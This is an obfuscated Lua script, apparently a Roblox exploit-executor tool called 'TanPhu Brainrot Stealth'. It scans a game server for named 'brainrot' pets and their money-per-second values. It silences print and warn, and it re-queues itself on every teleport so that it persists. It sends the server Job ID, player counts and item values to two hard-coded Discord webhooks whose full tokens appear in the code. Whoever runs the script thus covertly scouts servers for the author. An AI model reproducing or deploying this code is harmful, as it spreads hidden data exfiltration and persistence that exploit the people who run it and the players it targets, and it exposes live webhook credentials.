--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="TanPhu_Brainrot_Stealth_Dual.lua";local v1=game:GetService("HttpService");local v2=(syn and syn.queue_on_teleport) or queue_on_teleport or (fluxus and fluxus.queue_on_teleport) ;local v3=nil;pcall(function() if (isfile and readfile and isfile(v0)) then v3=readfile(v0);end end);local v4="";if ((type(v3)=="string") and ( #v3>(76 -(46 + 30)))) then v4=v1:Base64Encode(v3);end if v2 then local v81=0;local v82;while true do if (v81==(0 -0)) then v82=([[
    repeat task.wait() until game:IsLoaded()
    local HttpService = game:GetService("HttpService")
    -- Load from embedded source first
    local ok, src = pcall(function() return HttpService:Base64Decode("%s") end)
    if ok and type(src)=="string" and #src>0 then
      local f = loadstring(src)
      if f then f() end
    else
      -- Fallback to local file
      if loadfile and isfile and isfile("%s") then
        loadfile("%s")()
      elseif readfile and loadstring then
        local ok2, raw = pcall(readfile, "%s")
        if ok2 and raw then pcall(loadstring(raw)) end
      end
    end
  ]]):format(v4,v0,v0,v0);pcall(v2,v82);break;end end end local v5=true;local v6=game:GetService("Players");local v1=game:GetService("HttpService");if v5 then local v83=0;local v84;while true do if (v83==(1406 -(666 + 739))) then print=v84;warn=v84;break;end if (v83==(0 -0)) then v84=nil;function v84(...) end v83=1 -0 ;end end end local function v7(v21,v22) local v23=0 + 0 ;local v24;local v25;local v26;local v27;local v28;while true do if (v23==(794 -(368 + 423))) then if (v27 and v28 and (v28.StatusCode==(1347 -918))) then local v135=v28.Headers or v28.headers or {} ;local v136=tonumber(v135["Retry-After"] or v135["retry-after"] or (20 -(10 + 8)) ) or 2 ;task.wait(math.clamp(v136,3 -2 ,452 -(416 + 26) ));v28=v26({Url=v21,Method="POST",Headers=v25,Body=v24});if (v28 and ((v28.StatusCode==(651 -447)) or (v28.StatusCode==(86 + 114)))) then return true;end end return false,v28 and v28.StatusCode ;end if (v23==(3 -1)) then v27,v28=pcall(function() return v26({Url=v21,Method="POST",Headers=v25,Body=v24});end);if (v27 and v28 and ((v28.StatusCode==(642 -(145 + 293))) or (v28.StatusCode==200))) then return true;end v23=433 -(44 + 386) ;end if (v23==(1487 -(998 + 488))) then v26=(syn and syn.request) or http_request or request or (http and http.request) ;if  not v26 then return false,"no http";end v23=1 + 1 ;end if (v23==(0 + 0)) then v24=v1:JSONEncode(v22);v25={["Content-Type"]="application/json"};v23=1;end end end local function v8(v29) local v30="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";return (v29:gsub(".",function(v85) local v86,v87="",v85:byte();for v112=780 -(201 + 571) ,1139 -(116 + 1022) , -1 do v86=v86   .. (((((v87%((8 -6)^v112)) -(v87%((2 + 0)^(v112-1))))>(0 -0)) and "1") or "0") ;end return v86;end)   .. "0000"):gsub("%d%d%d?%d?%d?%d?",function(v88) if ( #v88<(21 -15)) then return "";end local v89=859 -(814 + 45) ;for v113=2 -1 ,6 do v89=v89 + (((v88:sub(v113,v113)=="1") and ((1 + 1)^(6 -v113))) or (0 + 0)) ;end return v30:sub(v89 + 1 ,v89 + 1 );end)   .. ({"","==","="})[( #v29%(1083 -(1020 + 60))) + (1424 -(630 + 793)) ] ;end local function v9(v31) v31=tonumber(v31) or (0 -0) ;local v32,v33,v34=math.abs(v31),"/s",v31;if (v32>=(3067285592 -2067285592)) then v34,v33=v31/1000000000 ,"B/s";elseif (v32>=1000000) then v34,v33=v31/1000000 ,"M/s";elseif (v32>=(145 + 855)) then v34,v33=v31/(1406 -406) ,"K/s";end return ("$%s%s"):format(tostring(("%.2f"):format(v34):gsub("%.?0+$","")),v33);end local function v10(v35) if (typeof(v35)=="number") then return v35;end if (typeof(v35)~="string") then return 0 -0 ;end local v36=v35:lower();local v37=tonumber((v36:match("([%d%.]+)")) or "0" ) or (0 -0) ;if v36:find("b") then v37=v37 * 1000000000 ;elseif v36:find("m") then v37=v37 * 1000000 ;elseif v36:find("k") then v37=v37 * (344 + 656) ;end return math.floor(v37 + (0.5 -0) );end local v11={"mps","moneypersec","money_per_sec","moneypersecond","persec","per_second"};local v12={"offline","cash","total","bank","balance","wallet","coins","gems","price","cost","buy","sell","collect","collected"};local function v13(v38,v39) v38=tostring(v38 or "" ):lower();for v90,v91 in ipairs(v39) do if v38:find(v91,1 + 0 ,true) then return true;end end return false;end local function v14(v40) local v41=0 -0 ;local v42;while true do if (v41==0) then v42=tostring(v40 or "" ):lower();return (v42:find("/s",15 -(9 + 5) ,true)~=nil) or v42:find("per%s*sec") or v42:find("per%s*second") ;end end end local function v15(v43) local v44={};if  not (v43 and v43.GetDescendants) then return v44;end local v45,v46=pcall(v43.GetDescendants,v43);if ( not v45 or (type(v46)~="table")) then return v44;end for v92=377 -(85 + 291) , #v46 do local v93=v46[v92];local v94=tostring(v93.Name or "" ):lower();if  not v13(v94,v12) then if (v93:IsA("TextLabel") or v93:IsA("TextButton")) then local v137=tostring(v93.Text or "" );if ((v137~="") and v14(v137) and  not v13(v137,v12)) then local v150=1265 -(243 + 1022) ;local v151;while true do if ((0 -0)==v150) then v151=v10(v137);if (v151>(0 + 0)) then v44[ #v44 + (1181 -(1123 + 57)) ]=v151;end break;end end end elseif v93:IsA("StringValue") then local v152=v93.Value;if ((type(v152)=="string") and v14(v152) and  not v13(v152,v12)) then local v162=0 + 0 ;local v163;while true do if (v162==(254 -(163 + 91))) then v163=v10(v152);if (v163>(1930 -(1869 + 61))) then v44[ #v44 + 1 + 0 ]=v163;end break;end end end elseif (v93:IsA("NumberValue") or v93:IsA("IntValue")) then if v13(v94,v11) then local v172=0 -0 ;local v173;while true do if ((0 -0)==v172) then v173=tonumber(v93.Value) or (0 + 0) ;if (v173>(0 -0)) then v44[ #v44 + 1 ]=v173;end break;end end end end end end for v95,v96 in ipairs({"MoneyPerSec","MoneyPerSecond","MPS"}) do local v97=v43:GetAttribute(v96);if (v97~=nil) then if ((typeof(v97)=="number") and (v97>(1850 -(1409 + 441)))) then v44[ #v44 + 1 ]=v97;elseif ((typeof(v97)=="string") and v14(v97)) then local v153=0;local v154;while true do if ((718 -(15 + 703))==v153) then v154=v10(v97);if (v154>(0 + 0)) then v44[ #v44 + 1 ]=v154;end break;end end end end end return v44;end local function v16() local v47=438 -(262 + 176) ;local v48;local v49;local v50;while true do if (v47==(1722 -(345 + 1376))) then function v49(v126) if v126 then v48[ #v48 + (689 -(198 + 490)) ]=v126;end end for v127,v128 in ipairs(v6:GetPlayers()) do for v139,v140 in ipairs({"Pets","Inventory","PetInventory","Bag","Backpack"}) do v49(v128:FindFirstChild(v140));end if (v128==v6.LocalPlayer) then v49(v128:FindFirstChild("PlayerGui"));end end v47=3 -1 ;end if (v47==(1266 -(1091 + 171))) then return v48;end if (v47==(1 + 2)) then if v50 then local v141,v142=pcall(v50.GetDescendants,v50);if (v141 and (type(v142)=="table")) then for v157=1, #v142 do local v158=v142[v157];if (v158:IsA("Folder") or v158:IsA("ModuleScript")) then local v167=0;local v168;while true do if (v167==(0 -0)) then v168=tostring(v158.Name or "" ):lower();if (v168:find("pet") or v168:find("brainrot")) then v49(v158);end break;end end end end end end v49(game:GetService("Workspace"));v47=12 -8 ;end if (v47==2) then v50=game:FindFirstChild("ReplicatedStorage");v49(v50);v47=377 -(123 + 251) ;end if (v47==(0 -0)) then v48={};v49=nil;v47=699 -(208 + 490) ;end end end local function v17(v51,v52) local v53=0;local v54;while true do if (v53==(1 + 0)) then return nil;end if (v53==0) then v54=tostring(v51 or "" ):lower();for v129,v130 in ipairs(v52) do local v131=0;local v132;while true do if (0==v131) then v132=tostring(v130.k or "" ):lower();if ((v132~="") and v54:find(v132,1,true)) then return v130;end break;end end end v53=1 + 0 ;end end end local function v18(v55,v56,v57,v58) local v59,v60={},{};for v98=837 -(660 + 176) , #v55 do local v99=v55[v98];local v100= not v56.min or (v99>=v56.min) ;local v101= not v56.max or (v99<=v56.max) ;if (v100 and v101) then local v124=0;local v125;while true do if ((0 + 0)==v124) then v125=(v57 or "")   .. ":"   .. tostring(v99) ;if ( not v59[v99] and  not (v58 and v58[v125])) then local v159=0;while true do if (v159==(202 -(14 + 188))) then v59[v99]=true;v60[ #v60 + (676 -(534 + 141)) ]=v99;break;end end end break;end end end end table.sort(v60);return v60;end local function v19(v61,v62,v63,v64,v65,v66) if ( not v63 or ( #v63==(0 + 0))) then return false;end local v67=v8(v66);local v68={};for v102=1 + 0 , #v63 do v68[v102]=v9(v63[v102]);end local v69="```\n"   .. table.concat(v68,"\n")   .. "\n```" ;local v70={username="Brainrot Notify | TanPhu Hub",embeds={{title="Brainrot Notify | TanPhu Hub",color=91995 -48220 ,fields={{name="Name",value=tostring(v62),inline=true},{name="Money per sec",value=v9(v63[1 + 0 ])   .. " (min)" ,inline=true},{name="Players",value=tostring(v64)   .. "/"   .. tostring(v65 or 0 ) ,inline=true},{name="Job ID (Mobile)",value="```"   .. v67   .. "```" ,inline=false},{name="Job ID (iOS)",value="```"   .. v67   .. "```" ,inline=false},{name="Job ID (PC)",value="```"   .. v67   .. "```" ,inline=false},{name="Prices (low->high)",value=v69,inline=false}},footer={text="Made by TanPhu Hub"},timestamp=os.date("!%Y-%m-%dT%H:%M:%SZ")}}};return v7(v61,v70);end local function v20(v71) local v72=v71.ONE_SHOT or false ;local v73=v71.FIRST_DELAY or (12 -7) ;local v74=v71.SCAN_INTERVAL or (220 -160) ;local v75=v71.WEBHOOK_URL;local v76=v71.RULES or {} ;local v77=v71.MAX_CARDS_PER_SERVER or (872 -(550 + 317)) ;local v78=false;local v79={};local function v80() if (v72 and v78) then return;end local v104=0 -0 ;local v105= #v6:GetPlayers();local v106=v6.MaxPlayers or (0 -0) ;local v107=tostring(game.JobId);local v108=v16();local v109={};for v114,v115 in ipairs(v76) do local v116=0 -0 ;local v117;while true do if (v116==(285 -(134 + 151))) then v117=tostring(v115.k or "" ):lower();if (v117~="") then v109[v117]=true;end break;end end end local function v110(v118,v119) if (v104>=v77) then return;end if v19(v75,v118,v119,v105,v106,v107) then local v133=1665 -(970 + 695) ;local v134;while true do if (v133==(1 -0)) then v104=v104 + (1991 -(582 + 1408)) ;break;end if (v133==0) then v134=tostring(v118):lower();for v160=3 -2 , #v119 do v79[v134   .. ":"   .. tostring(v119[v160]) ]=true;end v133=1;end end end end for v120=1 -0 , #v108 do local v121=v108[v120];local v122,v123=pcall(function() return (v121 and v121.GetDescendants and v121:GetDescendants()) or {} ;end);if (v122 and (type(v123)=="table")) then for v143=3 -2 , #v123 do local v144=v123[v143];local v145=tostring(v144.Name or "" ):lower();local v146=nil;for v148,v149 in pairs(v109) do if v145:find(v148,1825 -(1195 + 629) ,true) then v146=v148;break;end end if v146 then local v156=v17(v144.Name,v76);if v156 then local v164={};local function v165(v169) if  not v169 then return;end local v170,v171=pcall(v15,v169);if (v170 and (type(v171)=="table")) then for v178=1 -0 , #v171 do v164[ #v164 + 1 ]=v171[v178];end end end v165(v144);v165(v144.Parent);v165(v144.Parent and v144.Parent.Parent );local v166=v18(v164,v156,v145,v79);if ( #v166>0) then v110(v144.Name,v166);if (v104>=v77) then break;end end end end end end if (v104>=v77) then break;end end if ((v104>0) and v72) then v78=true;end end task.spawn(function() local v111=241 -(187 + 54) ;while true do if (v111==0) then task.wait(v73);while true do pcall(v80);task.wait(v74);end break;end end end);end v20({ONE_SHOT=false,FIRST_DELAY=785 -(162 + 618) ,SCAN_INTERVAL=43 + 17 ,WEBHOOK_URL="https://discordapp.com/api/webhooks/1410314122670903491/KD8clDHrbOMKlArHAoEyMXTqQGD6AAN7ftlYvdkFEOj5a9_VEGA9yqAhoH2XPK77TITb",MAX_CARDS_PER_SERVER=4 + 1 ,RULES={{k="graipuss medussi",min=0 -0 ,max=0 + 0 },{k="la grande combinasion",min=1636 -(1373 + 263) ,max=0},{k="los combinasionas",min=0 + 0 ,max=0},{k="nuclearo dinossauro",min=0,max=0},{k="los hotspotsitos",min=0 -0 ,max=1384 -(746 + 638) },{k="garama and madundung",min=0,max=0 -0 },{k="esok sekolah",min=1581 -(1535 + 46) ,max=0 + 0 },{k="dragon cannelloni",min=0,max=0 + 0 },{k="la supreme combinasion",min=560 -(306 + 254) ,max=0 + 0 },{k="secret lucky block",min=0 -0 ,max=1467 -(899 + 568) }}});v20({ONE_SHOT=false,FIRST_DELAY=5,SCAN_INTERVAL=60,WEBHOOK_URL="https://discordapp.com/api/webhooks/1411329828904374293/elK3umTJvdL6h4ml-EHg9DbM1wCdQJFpOsNWEEB79T0P1hRstSgd_ep75KIp-aHdIdoK",MAX_CARDS_PER_SERVER=5,RULES={{k="la vacca saturno saturnita",min=0,max=0},{k="torrtuginni dragonfrutini",min=603 -(268 + 335) ,max=290 -(60 + 230) },{k="agarrini la palini",min=0 + 0 ,max=0},{k="los tralaleritos",min=0,max=0},{k="las tralaleritas",min=0 -0 ,max=0 + 0 },{k="job job job sahur",min=0,max=1024 -(706 + 318) },{k="las vaquitas saturnitas",min=1271 -(945 + 326) ,max=0 -0 },{k="graipuss medussi",min=0 + 0 ,max=0},{k="pot hotspot",min=0 + 0 ,max=1500 -(1408 + 92) },{k="chicleteira bicicleteira",min=1086 -(461 + 625) ,max=0},{k="los spyderinis",min=1288 -(993 + 295) ,max=0}}});
